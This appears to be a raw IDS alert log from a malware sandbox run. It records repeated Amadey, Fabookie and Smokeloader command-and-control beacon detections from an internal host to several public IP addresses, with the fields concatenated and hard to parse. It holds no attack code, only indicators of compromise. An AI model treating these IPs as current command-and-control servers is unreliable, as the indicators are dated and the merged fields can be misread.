                                                                                                                                                                                    192.168.2.462.204.41.10950224802027700 01/05/23-09:00:03.416391TCP2027700ET TROJAN Amadey CnC Check-In5022480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350473802027700 01/05/23-09:00:34.433386TCP2027700ET TROJAN Amadey CnC Check-In5047380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350784802027700 01/05/23-09:01:04.067397TCP2027700ET TROJAN Amadey CnC Check-In5078480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350797802027700 01/05/23-09:01:05.097008TCP2027700ET TROJAN Amadey CnC Check-In5079780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350496802027700 01/05/23-09:00:35.953428TCP2027700ET TROJAN Amadey CnC Check-In5049680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350127802027700 01/05/23-08:59:52.721045TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949878802027700 01/05/23-08:59:09.247807TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950046802027700 01/05/23-08:59:42.920533TCP2027700ET TROJAN Amadey CnC Check-In5004680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949760802027700 01/05/23-08:58:39.158668TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950112802027700 01/05/23-08:59:51.286474TCP2027700ET TROJAN Amadey CnC Check-In5011280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950319802027700 01/05/23-09:00:12.949346TCP2027700ET TROJAN Amadey CnC Check-In5031980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949890802027700 01/05/23-08:59:11.236775TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349912802027700 01/05/23-08:59:13.692839TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950637802027700 01/05/23-09:00:48.436611TCP2027700ET TROJAN Amadey CnC Check-In5063780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350623802027700 01/05/23-09:00:47.009580TCP2027700ET TROJAN Amadey CnC Check-In5062380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950150802027700 01/05/23-08:59:54.650792TCP2027700ET TROJAN Amadey CnC Check-In5015080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349915802027700 01/05/23-08:59:13.981646TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949779802027700 01/05/23-08:58:48.344707TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350200802027700 01/05/23-09:00:00.941331TCP2027700ET TROJAN Amadey CnC Check-In5020080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350213802027700 01/05/23-09:00:02.433402TCP2027700ET TROJAN Amadey CnC Check-In5021380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949957802027700 01/05/23-08:59:24.466583TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350089802027700 01/05/23-08:59:48.824913TCP2027700ET TROJAN Amadey CnC Check-In5008980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350292802027700 01/05/23-09:00:10.003177TCP2027700ET TROJAN Amadey CnC Check-In5029280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950713802027700 01/05/23-09:00:57.660018TCP2027700ET TROJAN Amadey CnC Check-In5071380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350534802027700 01/05/23-09:00:39.227541TCP2027700ET TROJAN Amadey CnC Check-In5053480192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950795802027700 01/05/23-09:01:04.954635TCP2027700ET TROJAN Amadey CnC Check-In5079580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949827802027700 01/05/23-08:58:57.221076TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350060802027700 01/05/23-08:59:45.051206TCP2027700ET TROJAN Amadey CnC Check-In5006080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350432802027700 01/05/23-09:00:27.031813TCP2027700ET TROJAN Amadey CnC Check-In5043280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950665802027700 01/05/23-09:00:53.200536TCP2027700ET TROJAN Amadey CnC Check-In5066580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950341802027700 01/05/23-09:00:17.487935TCP2027700ET TROJAN Amadey CnC Check-In5034180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350445802027700 01/05/23-09:00:28.569322TCP2027700ET TROJAN Amadey CnC Check-In5044580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950576802027700 01/05/23-09:00:42.786422TCP2027700ET TROJAN Amadey CnC Check-In5057680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350254802027700 01/05/23-09:00:06.338634TCP2027700ET TROJAN Amadey CnC Check-In5025480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949852802027700 01/05/23-08:59:05.209359TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950316802027700 01/05/23-09:00:12.218672TCP2027700ET TROJAN Amadey CnC Check-In5031680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349997802027700 01/05/23-08:59:31.295981TCP2027700ET TROJAN Amadey CnC Check-In4999780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350035802027700 01/05/23-08:59:41.517278TCP2027700ET TROJAN Amadey CnC Check-In5003580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950179802027700 01/05/23-08:59:58.858144TCP2027700ET TROJAN Amadey CnC Check-In5017980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350116802027700 01/05/23-08:59:51.628169TCP2027700ET TROJAN Amadey CnC Check-In5011680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350468802027700 01/05/23-09:00:32.018517TCP2027700ET TROJAN Amadey CnC Check-In5046880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350407802027700 01/05/23-09:00:24.548807TCP2027700ET TROJAN Amadey CnC Check-In5040780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349947802027700 01/05/23-08:59:22.445608TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350180802027700 01/05/23-08:59:58.895130TCP2027700ET TROJAN Amadey CnC Check-In5018080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350505802027700 01/05/23-09:00:36.994006TCP2027700ET TROJAN Amadey CnC Check-In5050580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350759802027700 01/05/23-09:01:01.972492TCP2027700ET TROJAN Amadey CnC Check-In5075980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950424802027700 01/05/23-09:00:26.250769TCP2027700ET TROJAN Amadey CnC Check-In5042480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350460802027700 01/05/23-09:00:30.456826TCP2027700ET TROJAN Amadey CnC Check-In5046080192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949833802027700 01/05/23-08:58:59.004495TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350723802027700 01/05/23-09:00:58.765351TCP2027700ET TROJAN Amadey CnC Check-In5072380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350340802027700 01/05/23-09:00:17.275801TCP2027700ET TROJAN Amadey CnC Check-In5034080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349877802027700 01/05/23-08:59:09.325226TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950813802027700 01/05/23-09:01:06.470615TCP2027700ET TROJAN Amadey CnC Check-In5081380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350541802027700 01/05/23-09:00:39.980064TCP2027700ET TROJAN Amadey CnC Check-In5054180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950071802027700 01/05/23-08:59:46.777628TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950555802027700 01/05/23-09:00:41.254162TCP2027700ET TROJAN Amadey CnC Check-In5055580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350636802027700 01/05/23-09:00:48.393290TCP2027700ET TROJAN Amadey CnC Check-In5063680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350317802027700 01/05/23-09:00:12.726244TCP2027700ET TROJAN Amadey CnC Check-In5031780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950354802027700 01/05/23-09:00:19.168728TCP2027700ET TROJAN Amadey CnC Check-In5035480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350074802027700 01/05/23-08:59:47.026568TCP2027700ET TROJAN Amadey CnC Check-In5007480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350222802027700 01/05/23-09:00:03.270757TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350199802027700 01/05/23-09:00:00.872060TCP2027700ET TROJAN Amadey CnC Check-In5019980192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350726802027700 01/05/23-09:00:59.004260TCP2027700ET TROJAN Amadey CnC Check-In5072680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949908802027700 01/05/23-08:59:13.194726TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350792802027700 01/05/23-09:01:04.617976TCP2027700ET TROJAN Amadey CnC Check-In5079280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350525802027700 01/05/23-09:00:38.502864TCP2027700ET TROJAN Amadey CnC Check-In5052580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950542802027700 01/05/23-09:00:40.061715TCP2027700ET TROJAN Amadey CnC Check-In5054280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350353802027700 01/05/23-09:00:18.907939TCP2027700ET TROJAN Amadey CnC Check-In5035380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950269802027700 01/05/23-09:00:07.819982TCP2027700ET TROJAN Amadey CnC Check-In5026980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950539802027700 01/05/23-09:00:39.777060TCP2027700ET TROJAN Amadey CnC Check-In5053980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349927802027700 01/05/23-08:59:15.970448TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350185802027700 01/05/23-08:59:59.350277TCP2027700ET TROJAN Amadey CnC Check-In5018580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350314802027700 01/05/23-09:00:12.065224TCP2027700ET TROJAN Amadey CnC Check-In5031480192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350463802027700 01/05/23-09:00:30.651670TCP2027700ET TROJAN Amadey CnC Check-In5046380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350206802027700 01/05/23-09:00:01.655457TCP2027700ET TROJAN Amadey CnC Check-In5020680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950010802027700 01/05/23-08:59:33.190763TCP2027700ET TROJAN Amadey CnC Check-In5001080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350208802027700 01/05/23-09:00:01.921195TCP2027700ET TROJAN Amadey CnC Check-In5020880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949899802027700 01/05/23-08:59:12.230175TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350291802027700 01/05/23-09:00:09.845536TCP2027700ET TROJAN Amadey CnC Check-In5029180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950612802027700 01/05/23-09:00:46.010211TCP2027700ET TROJAN Amadey CnC Check-In5061280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950048802027700 01/05/23-08:59:43.254725TCP2027700ET TROJAN Amadey CnC Check-In5004880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950469802027700 01/05/23-09:00:32.139792TCP2027700ET TROJAN Amadey CnC Check-In5046980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949928802027700 01/05/23-08:59:16.156869TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350172802027700 01/05/23-08:59:58.243125TCP2027700ET TROJAN Amadey CnC Check-In5017280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350203802027700 01/05/23-09:00:01.370969TCP2027700ET TROJAN Amadey CnC Check-In5020380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350136802027700 01/05/23-08:59:53.628306TCP2027700ET TROJAN Amadey CnC Check-In5013680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350611802027700 01/05/23-09:00:45.884010TCP2027700ET TROJAN Amadey CnC Check-In5061180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350748802027700 01/05/23-09:01:00.949287TCP2027700ET TROJAN Amadey CnC Check-In5074880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949751802027700 01/05/23-08:58:36.904386TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949964802027700 01/05/23-08:59:25.616885TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950121802027700 01/05/23-08:59:52.118265TCP2027700ET TROJAN Amadey CnC Check-In5012180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950216802027700 01/05/23-09:00:02.609214TCP2027700ET TROJAN Amadey CnC Check-In5021680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950210802027700 01/05/23-09:00:02.006539TCP2027700ET TROJAN Amadey CnC Check-In5021080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350189802027700 01/05/23-08:59:59.824335TCP2027700ET TROJAN Amadey CnC Check-In5018980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950075802027700 01/05/23-08:59:47.120103TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350641802027700 01/05/23-09:00:48.985991TCP2027700ET TROJAN Amadey CnC Check-In5064180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950727802027700 01/05/23-09:00:59.170702TCP2027700ET TROJAN Amadey CnC Check-In5072780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350252802027700 01/05/23-09:00:06.188358TCP2027700ET TROJAN Amadey CnC Check-In5025280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350419802027700 01/05/23-09:00:25.681850TCP2027700ET TROJAN Amadey CnC Check-In5041980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950730802027700 01/05/23-09:00:59.492867TCP2027700ET TROJAN Amadey CnC Check-In5073080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949977802027700 01/05/23-08:59:28.282302TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949879802027700 01/05/23-08:59:09.532804TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350357802027700 01/05/23-09:00:19.508975TCP2027700ET TROJAN Amadey CnC Check-In5035780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350386802027700 01/05/23-09:00:22.817111TCP2027700ET TROJAN Amadey CnC Check-In5038680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950028802027700 01/05/23-08:59:37.775687TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350268802027700 01/05/23-09:00:07.593507TCP2027700ET TROJAN Amadey CnC Check-In5026880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950117802027700 01/05/23-08:59:51.855653TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949783802027700 01/05/23-08:58:50.923909TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350271802027700 01/05/23-09:00:08.033607TCP2027700ET TROJAN Amadey CnC Check-In5027180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350104802027700 01/05/23-08:59:50.380782TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950207802027700 01/05/23-09:00:01.651345TCP2027700ET TROJAN Amadey CnC Check-In5020780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950361802027700 01/05/23-09:00:19.892020TCP2027700ET TROJAN Amadey CnC Check-In5036180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950769802027700 01/05/23-09:01:02.858096TCP2027700ET TROJAN Amadey CnC Check-In5076980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350430802027700 01/05/23-09:00:26.794589TCP2027700ET TROJAN Amadey CnC Check-In5043080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350488802027700 01/05/23-09:00:34.902685TCP2027700ET TROJAN Amadey CnC Check-In5048880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350643802027700 01/05/23-09:00:49.009624TCP2027700ET TROJAN Amadey CnC Check-In5064380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349970802027700 01/05/23-08:59:27.314920TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350440802027700 01/05/23-09:00:27.918582TCP2027700ET TROJAN Amadey CnC Check-In5044080192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12349884802027700 01/05/23-08:59:10.124546TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950003802027700 01/05/23-08:59:32.173672TCP2027700ET TROJAN Amadey CnC Check-In5000380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949813802027700 01/05/23-08:58:54.450868TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349881802027700 01/05/23-08:59:09.842337TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950187802027700 01/05/23-08:59:59.667871TCP2027700ET TROJAN Amadey CnC Check-In5018780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350215802027700 01/05/23-09:00:02.576419TCP2027700ET TROJAN Amadey CnC Check-In5021580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350228802027700 01/05/23-09:00:03.862562TCP2027700ET TROJAN Amadey CnC Check-In5022880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.159.1850372802851115 01/05/23-09:00:21.680294TCP2851115ETPRO TROJAN Win32/Fabookie.ek CnC Activity M25037280192.168.2.445.66.159.18
                                                                                                                                                                                    192.168.2.445.66.230.12350304802027700 01/05/23-09:00:11.110179TCP2027700ET TROJAN Amadey CnC Check-In5030480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350360802027700 01/05/23-09:00:19.727404TCP2027700ET TROJAN Amadey CnC Check-In5036080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950457802027700 01/05/23-09:00:29.876026TCP2027700ET TROJAN Amadey CnC Check-In5045780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350812802027700 01/05/23-09:01:06.282762TCP2027700ET TROJAN Amadey CnC Check-In5081280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949882802027700 01/05/23-08:59:09.841386TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349951802027700 01/05/23-08:59:23.162904TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949971802027700 01/05/23-08:59:27.318420TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950743802027700 01/05/23-09:01:00.393291TCP2027700ET TROJAN Amadey CnC Check-In5074380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350640802027700 01/05/23-09:00:48.797450TCP2027700ET TROJAN Amadey CnC Check-In5064080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950091802027700 01/05/23-08:59:49.084824TCP2027700ET TROJAN Amadey CnC Check-In5009180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950305802027700 01/05/23-09:00:11.148232TCP2027700ET TROJAN Amadey CnC Check-In5030580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950654802027700 01/05/23-09:00:52.679355TCP2027700ET TROJAN Amadey CnC Check-In5065480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350456802027700 01/05/23-09:00:29.834841TCP2027700ET TROJAN Amadey CnC Check-In5045680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350297802027700 01/05/23-09:00:10.453390TCP2027700ET TROJAN Amadey CnC Check-In5029780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950530802027700 01/05/23-09:00:38.850237TCP2027700ET TROJAN Amadey CnC Check-In5053080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350202802027700 01/05/23-09:00:01.210425TCP2027700ET TROJAN Amadey CnC Check-In5020280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349941802027700 01/05/23-08:59:18.710600TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350601802027700 01/05/23-09:00:44.976313TCP2027700ET TROJAN Amadey CnC Check-In5060180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950476802027700 01/05/23-09:00:34.527456TCP2027700ET TROJAN Amadey CnC Check-In5047680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.437.34.248.2449920802851815 01/05/23-08:59:14.814538TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184992080192.168.2.437.34.248.24
                                                                                                                                                                                    192.168.2.445.32.200.11350775802027700 01/05/23-09:01:03.271791TCP2027700ET TROJAN Amadey CnC Check-In5077580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350673802027700 01/05/23-09:00:53.758617TCP2027700ET TROJAN Amadey CnC Check-In5067380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950724802027700 01/05/23-09:00:58.831438TCP2027700ET TROJAN Amadey CnC Check-In5072480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950335802027700 01/05/23-09:00:16.671901TCP2027700ET TROJAN Amadey CnC Check-In5033580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949922802027700 01/05/23-08:59:15.038977TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350627802027700 01/05/23-09:00:47.545192TCP2027700ET TROJAN Amadey CnC Check-In5062780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950157802027700 01/05/23-08:59:56.243038TCP2027700ET TROJAN Amadey CnC Check-In5015780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350710802027700 01/05/23-09:00:57.471023TCP2027700ET TROJAN Amadey CnC Check-In5071080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350768802027700 01/05/23-09:01:02.747840TCP2027700ET TROJAN Amadey CnC Check-In5076880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350532802027700 01/05/23-09:00:39.066304TCP2027700ET TROJAN Amadey CnC Check-In5053280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949829802027700 01/05/23-08:58:57.887757TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350805802027700 01/05/23-09:01:05.712078TCP2027700ET TROJAN Amadey CnC Check-In5080580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350294802027700 01/05/23-09:00:10.061489TCP2027700ET TROJAN Amadey CnC Check-In5029480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950780802027700 01/05/23-09:01:03.773012TCP2027700ET TROJAN Amadey CnC Check-In5078080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950391802027700 01/05/23-09:00:23.130860TCP2027700ET TROJAN Amadey CnC Check-In5039180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350785802027700 01/05/23-09:01:04.195018TCP2027700ET TROJAN Amadey CnC Check-In5078580192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949991802027700 01/05/23-08:59:30.264210TCP2027700ET TROJAN Amadey CnC Check-In4999180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350472802027700 01/05/23-09:00:34.033108TCP2027700ET TROJAN Amadey CnC Check-In5047280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350574802027700 01/05/23-09:00:42.760004TCP2027700ET TROJAN Amadey CnC Check-In5057480192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950503802027700 01/05/23-09:00:36.803500TCP2027700ET TROJAN Amadey CnC Check-In5050380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350778802027700 01/05/23-09:01:03.570748TCP2027700ET TROJAN Amadey CnC Check-In5077880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949790802027700 01/05/23-08:58:51.338614TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950592802027700 01/05/23-09:00:43.979935TCP2027700ET TROJAN Amadey CnC Check-In5059280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350311802027700 01/05/23-09:00:11.770616TCP2027700ET TROJAN Amadey CnC Check-In5031180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949754802027700 01/05/23-08:58:37.863229TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350133802027700 01/05/23-08:59:53.395514TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.159.1850836802851115 01/05/23-09:01:30.114460TCP2851115ETPRO TROJAN Win32/Fabookie.ek CnC Activity M25083680192.168.2.445.66.159.18
                                                                                                                                                                                    192.168.2.462.204.41.10949777802027700 01/05/23-08:58:47.535548TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.462.204.41.109
